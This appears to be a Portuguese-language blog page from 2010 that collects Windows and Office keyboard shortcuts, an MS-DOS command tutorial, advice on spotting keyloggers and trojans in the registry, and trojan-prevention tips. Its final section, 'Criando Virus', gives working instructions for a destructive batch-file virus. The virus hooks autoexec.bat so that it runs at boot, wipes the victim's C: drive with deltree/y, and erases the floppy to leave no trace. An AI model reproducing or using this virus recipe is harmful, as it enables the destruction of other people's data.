quarta-feira, 10 de fevereiro de 2010
Principais Atalhos do Windows;
Alt + Esc Alterna entre janelas na ordem em que foram abertas
Alt + F4 Fecha programa
Alt + Tab Alterna entre janelas de programas abertos
Alt + espaço, depois N ou X Minimiza ou maximiza janela
Ctrl + Esc Abre menu Iniciar
Ctrl + F4 Fecha janela de programa
Ctrl + Z Desfaz última ação
F1 Abre a ajuda
F2 Renomeia o item selecionado.
F3 Realiza pesquisa
Print Screen Captura tela, para colar em programas como o "Paint"
Alt + Print Screen Captura somente janela ativa
Shift Ao inserir CD-ROM no drive, evita que ele seja reproduzido automaticamente
Shift + Del Exclui um item sem armazená-lo na lixeira
Shift + F10 Equivale ao clique com o botão direito do mouse
Shift + Tab Retrocede entre itens de um documento
Tab Avança entre itens de um documento
Windows + D Minimiza ou restaura todas as janelas
Windows Mostra o Menu Iniciar
Windows + E Abre o Windows Explorer
Windows + F Abre o Pesquisar para arquivos
Windows + R Mostra a janela Executar
Windows + L Tranca a tela
Windows + U Abre o Gerenciador de Utilitários
Windows + CTRL + F Mostra o Pesquisar para computador (em rede)
Windows + Shift + M Desfaz minimizar (para todas as janelas)
Windows + F1 Para Ajuda e Suporte
Windows + BREAK Mostra as Propriedades de Sistema
Geral de aplicativos do Windows:
Ctrl + F4 para fechar documentos
Ctrl + F12 para abrir documentos
F12 para abrir o "salvar como"
Ctr + TAB para alternar entre documentos, como no excel, imaging ou photoeditor, por exemplo (não funciona no Word)
Alguns Atalhos do Internet Explorer:
Alt + seta para cima ou para baixo Na janela de organizar favoritos - move item para cima ou para baixo.
Alt + seta para a direita Avança para página seguinte
Backspace ou Alt + seta para a esquerda Volta para página anterior
Alt + Home Abre página inicial do Internet Explorer
Ctrl + B Abre janela para organizar Favoritos
Ctrl + D Adiciona página à pasta Favoritos
Ctrl + F Localiza palavra na página
Ctrl + H Ativa barra com histórico na lateral da janela
Ctrl + I Ativa barra com sites favoritos na lateral da janela
Ctrl + N Abre nova janela do navegador
Ctr + O ou L Abre campo para digitar e ir a nova página da rede ou abrir arquivo
Ctrl + Enter Adiciona http://www. Antes e .com depois de palavra digitada na barra de endereços
Ctrl + setas para a esquerda ou para a direita Na barra de endereços - move o cursor para a esquerda ou para a direita da quebra lógica anterior ou seguinte: ponto, barra ou dois pontos
Esc Interrompe a transmissão de uma página quando está sendo carregada ou a música de fundo quando existe e a página já está carregada
F4 Exibe histórico da barra de endereços
F5 Atualiza página recarregando-a
F6 Alterna entre frames de uma página e barra de endereços.
F11 Alterna entre visualização normal e tela cheia
Alguns Atalhos do Outlook Express.
Ctrl + D Apaga mensagem
Ctrl + E Localiza pessoa no catálogo de endereços
Ctrl + F Encaminha mensagem
Ctrl + J Vai à próxima pasta com mensagens não lidas
Ctrl + M Enviar e receber mensagens
Ctrl + N Nova mensagem
Ctrl + Q Marca mensagem como lida
Ctrl + R Responde ao autor
Ctrl + S Salva mensagem
Ctrl + Enter Quando conectado e com destinatário definido, envia mensagem
Ctrl + F3 Exibe código-fonte da mensagem
Ctrl + Shift + A Marca todas mensagens de uma pasta como lidas
Ctrl + Shift + B Abre catálogo de endereços
Ctrl + Shift + E Abre janela para criar nova pasta
Ctrl + Shift + F Localiza mensagem
Ctrl + Shift + N Cria nova entrada no catálogo de endereços
Ctrl + Shift + O Abre opções do Outlook Express
Ctrl + Shift + R Responder a todos
Esc Fecha mensagem
Alguns Atalhos do Word:
Alt + Ctrl + F Insere nota de rodapé, aquela com o número 1 sobrescrito no texto e a referência no pé da página
Alt + Ctrl + I, O, P ou N Muda estilo de visualização da página
Alt + Ctrl + Y Vai para início da página seguinte
Alt + Ctrl + M Insere comentário
Ctrl + [ ou ] Diminui ou aumenta tamanho da fonte em um ponto
Ctrl + = aplica subscrito
Ctrl + Shift + = Aplica sobrescrito
Ctrl + 1, 2 ou 5 Define espaçamento entre linhas simples, duplo ou de 1,5 linha
Ctrl + D Abre caixa de formatação de fonte
Ctrl + End Vai para fim do documento
Ctrl + I, N ou S Aplica efeito itálico, negrito ou sublinhado em termos selecionados
Ctrl + T Seleciona todo o texto
Ctrl + U Localiza e substitui palavras ou expressões
Ctrl + Del ou backspace Apaga palavra seguinte ou anterior
Ctrl + Shift + F8 Ativa seleção de bloco quadrilátero de texto
Ctrl + Shift + C ou V Copia ou cola formatação de fontes
F4 Repete a última ação
F7 Verifica ortografia e gramática
F12 Salvar como
Shift + F3 Aplica letras maiúsculas em todo o texto selecionado
Shift + F7 Abre dicionário de sinônimos
Ctrl + Home vai para o início do "mesmo" documento
Comandos básicos do MS-DOS
DOS (Disk Operating System) é um "sistema operacional" desenvolvido para permitir ao usuário realizar todas as funções básicas e essenciais no computador. Poucos foram os DOS produzidos até hoje: MS-DOS, da Microsoft, o PC-DOS, da IBM, DR-DOS, da Digital Research, o NOVELL, para redes, etc. O MS-DOS dominou amplamente o mercado em sua época e, até hoje, faz faz parte do Software Básico (programa indispensável ao funcionamento do computador). Ele, até certo ponto, atua como uma interface básica do hardware do computador, por isso é tão especial. São raros os programas executados no Windows que possuem ajuda do DOS. Isso deixa claro que ele é mais usado para gerenciar e resolver problemas de sistema. O DOS é uma forma de você comunicar suas instruções ao computador. E tais instruções devem ser as que ele reconhece. Estas instruções, na maior parte, consistem em palavras baseadas na língua inglesa.
PROMPT
As funções do DOS são padronizadas e independentes do hardware de cada computador. Por outro lado, cada PC tem funções básicas elementares peculiares ao seu projeto eletrônico. Por isso, precisa ter um programa que decompõem as funções padrões do DOS nas suas funções elementares. Chamado de BIOS ( em inglês Binary Input Output System ), esse programa é gravado em memória permanente na placa-mãe do PC e tem a função de dar partida na operação BOOT, ativando o DOS e atuar durante toda a operação, fazendo a ligação entre o DOS e o hardware.
Antes de irmos aos comandos, veremos primeiro o que é PROMPT:
PROMPT é o chamado sinal de prontidão, pois indica que o computador está pronto para receber instruções. Ele mostra também sua localização, ou seja, em que drive (unidade de armazenamento) e diretório você está trabalhando. Veja o exemplo:
C:\DOS>_
O exemplo indica que você está no drive C:\, na pasta DOS. Ao lado do sinal >, há um "tracinho" piscando, chamado CURSOR. Ele indica aonde vai aparecer os carecteres que você digitar.
COMO ACESSAR O DOS
Para acessar o DOS existe, basicamente, 3 formas. Se você estiver no Windows 98, basta clicar em Iniciar/Desligar e escolher "Reiniciar o computador em modo MS-DOS". Outra forma no Windows é, clicar em Iniciar/Programas e selecionar "Prompt do MS-DOS". Mas está última acessará o DOS com o Windows ainda carregado, o que significa que alguns comandos podem não funcionar. Se estiver com o computador desligado e quiser ir direto para o DOS, sem passar pelo Windows, fique clicando em F8 até um lista aparecer. Escolha "Somente Prompt de Comando", que normalmente é o penúltimo item.
Vale lembrar que, se você usa o Windows Millenium ou superior, o acesso ao DOS não é tão simples, visto que este sistema operacional é menos dependente do DOS do que o Windows98 ou 95. Se você quiser usar o DOS no WinMe, terá que reiniciar o computador com o disquete de boot, criado no próprio WinMe.
Outra coisa que vale lembrar é que você pode não ter o DOS completo se usa o Win98 ou 95. Isso porque o DOS completo era para ser usado sozinho, como um sistema operacional único. Com o Windows, alguns comandos foram retirados e deixado somente os essenciais. Mas você pode copiar os outros comandos para o seu computador, se tiver uma cópia do DOS completa.
EXECUTANDO OS COMANDOS
Antes de começarmos a ver os comandos, é necessário saber como executá-los. No prompt, você verá o cursor piscando. Isso significa que você já pode digitar. Depois de ter escolhido o comando, tecle Enter. Aqui, para exemplificar usaremos o modelo de prompt "C:\Windows>", mas vale lembrar que "C" pode ser qualquer unidade de disco no seu computador. Normalmente a letra A indica a unidade de disquete. E "Windows" pode significar qualquer pasta dentro da unidade que você está trabalhando. Mas, é importante saber que o DOS geralmente não visualiza nomes de arquivos com mais de 8 caracteres. Por isso, a pasta Meus Documentos, por exemplo, fica assim: MEUSDO~1.
COMANDOS:
DATE
Comando que atualiza a data do sistema operacional:
DD - DIA Dígito entre 1 - 31
MM - MÊS Dígito entre 1 - 12
AA - ANO Dígito entre 80 - 99
Separadores: Hífen ( - ), Barra ( / ) ou Ponto ( . )
Exemplo:
C:\>DATE
O Sistema apresentará a seguinte tela:
Em seguida, digita-se a data atual e pressiona-se Enter.
TIME
Comando que atualiza a hora do sistema operacional:
hh - Horas - Dígito entre 0 - 24
mm - Minuto - Dígito entre 0 - 59
ss - Segundo - Dígito entre 0 - 59
Separadores: Dígito Pontos ( : ) ou Ponto ( . ).
Exemplo:
C:\>Time
O Sistema apresentará a seguinte tela:
Em seguida, digita-se a hora atual e tecla-se Enter.
VER
Comando que mostra a versão do sistema operacional:
C:\>VER
DIR
Comando que mostra a lista de arquivos de um diretório (pasta). Este comando pode conter algumas variações para obter-se uma resposta diferente:
* /P Lista o diretório com pausa, usado quando a pasta encontra-se com v�rios arquivos.
* /W Lista o diretório na horizontal.
* / ? Lista todas as opções do comando DIR.
O comando dir apresenta, ainda, três informações bastante importantes ao seu final: o número de arquivos contidos no diretório corrente, o espaço em disco ocupado por este(s) arquivo(s) e o espa�o disponível no disco.
Exemplo:
C:\>DIR / W
C:\>DIR /P
C:\>DIR / W
CLS
Comando que limpa a tela e deixa o cursor no canto superior esquerdo:
Exemplo:
C:\>CLS
MKDIR ou MD
Comando que cria um diretório a partir da pasta corrente com o nome especificado:
Sintaxe: MD [caminho] { Nome } ou MKDIR [caminho] { Nome }
Exemplo:
C:\>MD PROFESSOR
C:\>MKDIR PROFESSOR\ALUNOS
CHDIR ou CD
Comando que muda um subdiretório corrente a partir do diretório atual:
Sintaxe: CD [caminho] ou CHDIR [caminho]
Exemplo:
C:\>CD PROFESSOR - entra no diretório PROFESSOR
C:\>CD PROFESSOR\ALUNOS - alterna para o subdiretório ALUNOS do diretório PROFESSOR
C:\>CD - indica o caminho (PATH) atual.
RMDIR ou RD
Comando que remove um subdiretório a partir do drive corrente. O subdiretório somente será eliminado se não conter nenhum arquivo ou subdiretório em seu interior:
Sintaxe: RD [caminho] ou RMDIR [caminho]
Exemplo:
C:\>RD PROFESSOR\ALUNOS - remove o subdiretório ALUNOS do diretório PROFESSOR.
C:\>RD PROFESSOR - remove o diretório PROFESSOR.
TREE
Comando que exibe graficamente a árvore de diretórios e subdiretórios a partir do diretório-raiz para que o usuário tenha a organização hierarquia do seu disco. Este comando pode conter algumas variações para obter-se um resultado diferente:
* /F Exibe a árvore de subdiretórios, mostrando também os arquivos existentes dentro dele.
* /A Instrui o comando TREE a usar os caracteres gráficos disponíveis em todas as Páginas de Código e permite um processo de impressão mais rápido.
Exemplo:
C:\>TREE
C:\>TREE /F
C:\>TREE /A
CHKDSK
Comando que checa o disco mostrando informações sobre este na tela:
Sintaxe: CHKDSK [unidade:]
Exemplo:
C:\>CHKDSK C: - checa o disco rígido C:
C:\>CHKDSK A: - checa o disco flexível A:
MEM
Comando que fornece informações sobre a memória:
Sintaxe: MEM
Exemplo:
C:\>MEM
RENAME ou REN
Comando que faz a renomeação (TROCA) do nome ou extensão de um arquivo a partir do drive corrente:
Sintaxe: RENAME ou REN [unidade:] [caminho] { Nome Antigo } { Nome Novo }
Exemplo:
C:\> REN SMART.DOC INSTRUTOR.DOC - muda o nome do arquivo SMART.DOC para INSTRUTOR.DOC
C:\> REN *.DPR *.PRG - muda a extensão dos arquivos em .DPR para .PRG
COPY
Comando que copia um arquivo ou grupo de arquivos de uma ORIGEM para um DESTINO:
Sintaxe: COPY [unidade:] [caminho] { Nome Origem } [unidade:] [caminho] { Nome Destino }
Exemplo:
C:\>COPY A:\TESTE.XXX C:\AULA , faz a cópia de arquivo TESTE.XXX do DRIVE de origem A: para o DRIVE de destino C:\AULA.
Neste comando utiliza-se muito os caracteres "curingas", que têm a função de substituir qualquer caractere ou grupos de caracteres. Os caracteres curingas são representados abaixo de acordo com a sua finalidade:
* - para qualquer quantidade de caracteres.
? - para um caractere.
Exemplo:
C:\>COPY C:DOSS*.* C:AULA , faz a cópia de todos os arquivos que têm o nome que se inicia com a letra S do diretório de origem C:\DOS para o diretório de destino C:\AULA.
C:\>COPY C:\DOSVENDAS?.DOC C:\AULA , faz cópia de todos os arquivos que têm a palavra VENDAS + 1 CARACTER.
DISKCOPY
Quando necessitamos fazer uma cópia das informações de um disquete, podemos utilizar o comandos Diskcopy. Este comando faz a duplicação de um disco, sendo que os dois discos devem possuir o mesmo tamanho e capacidade. Este comando só permite a duplicação de discos flexíveis. Além disso, este comando pode conter variações para obter-se uma resposta diferente:
* /V = Faz a verificação durante a duplicação do disco.
Sintaxe: DISKCOPY [unidade:] [unidade:] /V
Exemplo:
C:\>DISKCOPY A: B: - faz a duplicação de um disco na unidade A: para unidade B:, sendo que os dois discos devem possuir o mesmo tamanho e capacidade.
XCOPY
Comando que copia arquivos seletivamente, lendo em sub-diretórios diferentes na origem e podendo criar os sub-diretórios na unidade de destino, se assim for desejado. Este comando pode conter variações para obter-se uma resposta diferente:
* ORIGEM Drive, caminho e nome dos arquivos de origem.
* DESTINO Drive, caminho e nome dos arquivos de destino.
* /M Copia os arquivos de origem e os "marca".
* /D: data Copia os arquivos de origem que foram modificados na data definida em
"data" ou depois dela, (mm,dd,yy é o formato default")
* /S Copia os arquivos em diretórios e subdiretórios, a não ser que estejam vazios.
* /E Copia os subdiretórios mesmo que estejam vazios.
Sintaxe: XCOPY [ ORIGEM] [DESTINO] /M /D:data /S /E /V
Exemplo:
C:\>XCOPY C:DOS A: , copia o diretório DOS para o drive A: .
MOVE
Comando que tem duas funções: Renomear diretórios ou mover arquivos de um diretório para outro:
Sintaxe: MOVE [unidade:] [caminho] [nome antigo] [nome novo] ou [Origem] [Destino]
Exemplo:
C:\>MOVE C:\AULA C:\TESTE - renomeia o diretório C:\AULA para C:\TESTE
C:\>MOVE C:\AULA*.* A:\ - faz a movimentação de todos os arquivos do drive de origem C:\AULA para o drive de destino A:\, deixando assim o diretório C:\AULA vazio.
TYPE
Comando que exibe o conteúdo de um determinado arquivo:
Sintaxe: TYPE [unidade:] [CAMINHO] { Nome do Arquivo }
Exemplo:
C:\TYPE CONFIG.SYS Exibe o conteúdo do arquivo CONFIG.SYS na tela.
Utilizando este comando você pode também imprimir o conteúdo de um arquivo bastando para tanto adicionar a terminação > PRN ou > LPT1 ao comando.
Exemplo:
C:\>TYPE CONFIG.SYS > PRN Imprime o conteúdo do arquivo CONFIG.SYS.
MORE
Comando que exibe o conteúdo de um determinado arquivo, fazendo uma pausa cada vez que a tela é preenchida:
Sintaxe: MORE < [unidade:] [caminho] { Nome do Arquivo }
Exemplo:
MORE < TESTE.TXT
FORMAT
Antes de utilizar ou reutilizar um disco novo, você precisa prepará-lo para receber as informações e, essa preparação do disco é chamada de formatação, que tem a função de redefinir trilhas e setores na superfície magnética do disco. Num disco formatado podemos copiar um arquivo, um diretório de vários arquivos ou até um disco inteiro. A formatação deve ser aplicada com cuidado pois destrói o conteúdo anterior do disco. Este comando pode conter algumas variações para obter-se uma resposta diferente:
/S Formata o disco na unidade especificada e insere o Sistema Operacional DOS
/4 Formata o disquete de baixa densidade em drives de alta densidade
/Q Formata rapidamente o disco da unidade (Formatação Rápida)
/U formata o disco da unidade independente da condição (UNCONDICIONABLE)
Sintaxe: FORMAT [unidade:] /Q /U /S /4
Exemplo:
C:\>FORMAT A: - formata o disco na unidade A:
ATENÇÃO: tenha cuidado nas formatações de discos ,pois elas fazem com que o conteúdo do disco seja perdido. Vale lembrar que esta operação se torna muito mais crítica quando estamos formatando a unidade C ( FORMAT C:\ ), operação não indicada para pessoas com pouco conhecimento no assunto.
UNFORMAT
Caso aconteça de você formatar um disco por acidente, o MS-DOS permite a recuperação das informações, há não ser que você tenha utilizado o parâmetro /U em sua formatação. O comando UNFORMAT recupera as informações de um disco formatado. Este comando pode conter variações para obter-se uma resposta diferente:
/L Recupera as informações de um disco, mostrando a lista de arquivos e diretórios
/TEST Lista todas informações, mas não refaz o disco
Sintaxe: UNFORMAT [unidade:] /L /TEST /P
Exemplo:
C:\>UNFORMAT A: - desformata o disco na unidade A:
DEL ou DELETE
Comando que faz a eliminação de arquivos:
Sintaxe: DEL [unidade] [caminho] { Nome do Arquivo }
Exemplo:
DEL C:\WINWORD\CASTAS.DOC - deleta o arquivo CARTAS.DOC do diretório WINWORD
DEL *.DOC , deleta todos os arquivos com extensão .DOC
do diretório corrente
DEL C:\ADMIN\*.* - deleta todos os arquivos do diretório ADMIN
UNDELETE
No desenvolvimento diário de suas tarefas do dia a dia é muito comum você apagar um ou mais arquivos, e depois descobrir que aquele(s) arquivo(s) era(m) importante(s). A partir da versão 5.0 do MS-DOS houve a implantação de um comando muito útil chamado Undelete, que nos permite (às vezes...) recuperar estes arquivos. Existem versões deste utilitário para o MS-DOS ou MS-Windows:
Sintaxe: UNDELETE [unidade:] [caminho] { Nome do Arquivo }
Exemplo:
UNDELETE C:\WINWORD\CARTAS.DOC - recupera o arquivo CARTAS.DOC do diretório WINWORD
DELTREE
Comando que apaga um ou mais subdiretórios do disco a partir do diretório corrente:
O comando deltree apaga todos os arquivos e subdiretórios dentro de um diretório de uma só vez. Como precaução ele sempre exibirá uma mensagem na tela perguntando se você realmente deseja apagar.
Exemplo:
C:\>DELTREE PROFESSOR
Utilizando-se deste comando o usuário poderá apagar subdiretórios com mais rapidez e eficiência.
Remover Keylogger e Trojan
Bom.. primeira mente vou explicar a vocês qual o risco que um trojan e um keylogger pode trazer a sua maquina.
Segundamente vou deixar bem claro, que este tutorial não faz magica, entao porfavor muito cuidado quando mexer no registro do windows.
Então antes de tudo, passe um anti-virus dos bons em sua maquina para ver se ele próprio ja resolva seu poblema.
Anti-virus recomendados:
-Kaspersky ( O Melhor sem Duvidas )
-Nod32 ( Outro exelente anti-virus)
-Avast (Otimo anti-virus gratis)
-AviraAntiVir (Exelente anti-virus gratuito)
Dentre outros que voce pode achar o hacking no Google.
Uma Breve, Explicação sobre trojans e keyloggers
Se esqueci de algo, porfavor postem ai e adicionarei ao topico.
- Um trojan nada + é do que um programa, feito por programadores experientes, que usam essa ferramenta para brincar com um amigo zuando com a maquina alvo.
Ele também usa essa ferramenta para detonar a vitima que provocou de algum jeito.
Profissionais fazem seus programas, e depois que começam a ser detectados pelos anti-virus eles fazem a distribuição desses programas, na maioria das vezes de graça.
A maioria das pessoas que tem acesso a esses programas, são todos hackers, que por sua vez utilizam o programa quando há necessidade.
Já outras pessoas como meninos ou usuarios mal-intencionados usam um trojan para zuar e sacanear seus amigos.. outros por vicio quando não se tem um alvo certo, começam a fazer como esporte e tirando vantagem se achando os tais.
Já definindo um keylogger, é um programa de captura de teclas.
Ou seja um keylogger tem varias funçoes e varios jeitos de ser programados, como um exemplo pode ser um keylogger simples de captura de senhas digitadas nas paginas da net como (orkut, msn, sites de bancos e variados diversos outros sites)
Um keylogger mais sofisticado como o “Ardamax Keylogger 2.7” ele é um exelente keylogger que captura até a própria tela do computador da pessoa infectada.
Porém não ficou muito tempo indetectavel, pois é um keylogger comercial e facilmente chega a mira dos “anti-virus online” que capturam todas as informaçoes sobre as pragas da net, assim os desenvolvedores e atualização dos anti-virus sempre pegam os programas maliciosos comerciais mais cedo de que outros feito por programadores profissional e por amadores.
Bom.. entao uma vitima infectada com um keylogger, ela vai ser bastante sacaneada
Tendo sua privacidade totalmente exposta.
Suas senhas e dados, converssas e mt + tudo exposto na net.
Os derivados digamos que “bandidos” usam um keylogger feito por eles mesmo, a maioria feito em delphi para furtar senhas de bancos.
Keyloggers são muito usados por amadores, que pegam senhas de orkut, msn, websites e afins.
Na maioria das vezes, usuarios mal-intencionados querendo acabar com a diverssão na net de outras pessoas, como seus amigos são as principais vitimas de quem tem um conhecimento a + no mundo hacker.
Então a seguir mostro a vocês como ver se está infectado com um trojan ou Keylogger.
Vá no iniciar/executar e digite “msconfig” sem as aspas
Abrira esta janela, observe na figura abaixo:
Bom, Clique em “inicializar” que esta marcado de vermelho.
E repara se tem algo incomum iniciando com o Sistema.
Se não tiver, BLZ vc não tem um keylogger ou trojan.
Mais por segurança, Mais verificar de uma outra maneira.
Vá no iniciar/executar e digite “regedit” sem as aspas.
Depois Tecle enter, e aparecera está tela.
omo você deve ser, voce está no editor de registro do windows.
Então vá até a chave:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
E observe todos os arquivos, que está la.
Na figura voce pode observar que os aquivos são:
(Padrão) => Arquivo do Windows
C-Media Mixer => Arquivo de audio do meu computador, o do seu pode ser diferente até mesmo com outro nome.
GrooveMonitor => Aplicativo do Office, como vcs podem ver no local onde ele se encontra.
ITunes ... => Programa de audio, que inicia junto com meu windows.
Kis => meu anti-virus “Kaspersky” é o melhor de todos.
SiteAdvisor => plicativo de segurança para navegação na web (McAfee)
Como podem ver eu não estou infectado, Mais voce pode estar.
Entao se perceber algum arquivo anormal que esteje la, cuidado voce pode ser uma vitima de keylogger ou trojan.
Recomendo que vc veja onde esta localizado certinho o arquivo com nome desconhecido, e se ver que realmente é um trojan, ENTÃO DELETE NA HORA!
Assim voce fica livre dessas pragas.
Cavalos de Tróia
1. Saiba o que são os cavalos de Tróia
Cavalos de Tróia são programas que vem escondidos dentro de outros sem que o usuário saiba de sua existência. Eles podem permitir que outra pessoa obtenha controle sobre a máquina de um internauta conectado à Internet.
Atualmente, o recursos tem sido amplamente utilizado para invadir máquinas conectadas à Internet. A tática é simples: mandar um programa qualquer (protetores de tela ou animações engraçadinhas, por exemplo), que na verdade contém inserido um outro que dá ao cracker acesso remoto à máquina onde o cavalo de Tróia foi instalado. Esses softwares são verdadeiras portas de acesso ao conteúdo do computador.
Os Cavalos de Tróia permitem que outra pessoa obtenha controle sobre a máquina do usuário, através do protocolo TCP/IP da Internet. Testes demonstraram que o administrador remoto é capaz de acessar dados e efetuar tarefas com mais eficiência do que o próprio usuário que está em frente à máquina.
2. Conheça os programas Back Orifice, Netbus, Sockets de Tróie e outros
Entre os principais troianos estão o Back Orifice (BO), que se instala em micros que rodam o Windows 95/98, o NetBus, capaz de rodar também no Windows NT, o Master's Paradise 98 e o Sockets de Troie (ST). Todos apresentam características semelhantes: permitem administração remota, revelam as senhas contidas no sistema operacional do usuário e mostram em tempo real tudo aquilo que é digitado.
3. Dicas para evitar a invasão de seu micro
- Proteja e troque a sua senha
O controle deve começar pela identidade digital do usuário. User e senha são identificações particulares que merecem o máximo cuidado e sigilo. Com certeza, ninguém gostaria de compartilhar a sua senha bancária ou o número do seu cartão de crédito com mais alguém. O mesmo deve acontecer com a sua senha de acesso.
A troca periódica da senha é um bom começo para quem não quer dar chance ao azar. A maioria dos provedores de acesso oferece esse serviço online. Para maior segurança, o usuário deve utilizar senhas relativamente complexas. No mínimo, utilize uma senha alfanumérica com 6 caracteres. Mantenha o hábito de conferir o extrato detalhado da utilização da sua conta de acesso. Ao notar qualquer alteração no número de horas utilizadas, entre em contato com administração do seu provedor.
Isso evita alguns problemas, mas não funciona se o seu computador já tiver um cavalo de Tróia instalado. Isso porque alguns desses programas permitem ao cracker roubar a sua senha do seu próprio micro. Nesse caso, é necessário desinstalar o troiano de sua máquina, antes de mais nada. Para saber se há algum cavalo de Tróia instalado em sua máquina, você precisa de um programa detector.
- Não execute programas de origem duvidosa
Antes de mais nada, para evitar que a sua máquina seja vítima de um ataque deste tipo, recomendamos que você pense duas vezes entes de rodar qualquer arquivo executável (qq_coisa.exe) encontrado na rede ou recebido por e-mail. Mesmo que você receba um executável de um conhecido ou amigo, procure saber antes a procedência do mesmo.
- Seja cauteloso com o IRC e ICQ
Muitos dos programas de IRC tem bugs conhecidos que permitem aos usuarios enviar executáveis para outros, em certas circunstâncias. Não aceite programas (jogos, screensavers etc.) recebidos via IRC porque não há como saber quem o está enviando, e também nunca se deve deixar o IRC aceitando automaticamente transmissões de arquivos ou executando scripts. As mesmas precauções valem para o ICQ. Não acredite em noticias recebidas ao acaso dizendo coisas como "use este programa para atualizar seu ICQ" ou "rode este patch para proteger seu Explorer" etc. Se receber algo assim, confira sempre as notícias no site do fabricante do software em questão.
- Atualize o seu navegador periodicamente
Além da troca de senha, o usuário precisa manter seus softwares sempre atualizados. Tanto o navegador da Netscape quanto o da Microsoft (Internet Explorer) já apresentaram bugs de segurança em quase todas as suas versões. Tão logo estes bugs são descobertos, as respectivas fabricantes oferecem patches de correção para os problemas. Visitas regulares ao site da fabricante do seu navegador preferido o ajudarão na coleta de informações sobre os bugs e suas respectivas correções.
4. Copie programas para se defender
Para evitar que a sua máquina seja vítima do ataque de um cracker utilize um Firewall.
Como adivinhar uma senha
Deixando o PC mais rapido
• Na aba Avançado, dentro de Desempenho, clique em Configurações;
• Na aba Efeitos Visuais, selecione a opção Personalizar: as únicas que vc vai deixar marcadas é a 1ª, 4ª e a 5ª "de baixo para cima" e clique em ok.
Va em:
• inicialização e recuperação
• desmarque a opção > reiniciar automaticamente ok
Depois na opçao
• Relatório de erros
• Desativar > ok
Criando Virus
Digite: Edit (nome do seu arquivo).bat, deverá aparecer uma tela azul.
Entre com os comandos: @ECHO OFF e BREAK OFF . A página deverá ficar da seguinte maneira, como está abaixo:
@ECHO OFF
BREAK OFF
Depois disso, a pessoa escolhe o que seu vírus deve fazer. Depois ela usa o comando copy a:\(nome do seu vírus).bat autoexec.bat, ela então terá a certeza de estar executando seu vírus ao iniciar o computador-alvo. Agora vamos supor que o seu vírus seja capaz de apagar todos os arquivos do PC alheio. Você deve usar o seguinte comando:
deltree/y c:\*.*
Agora, o vírus simples da pessoa está completo. É só a vítima (seu amiguinho) executar o arquivo e pronto!
Caso a pessoa passe esse vírus via disquete, ele não deve esqueçer de finalizar o arquivo com o comando deltree/y a:\*.*. Isso serve para não deixar vestígios de seu ato insano.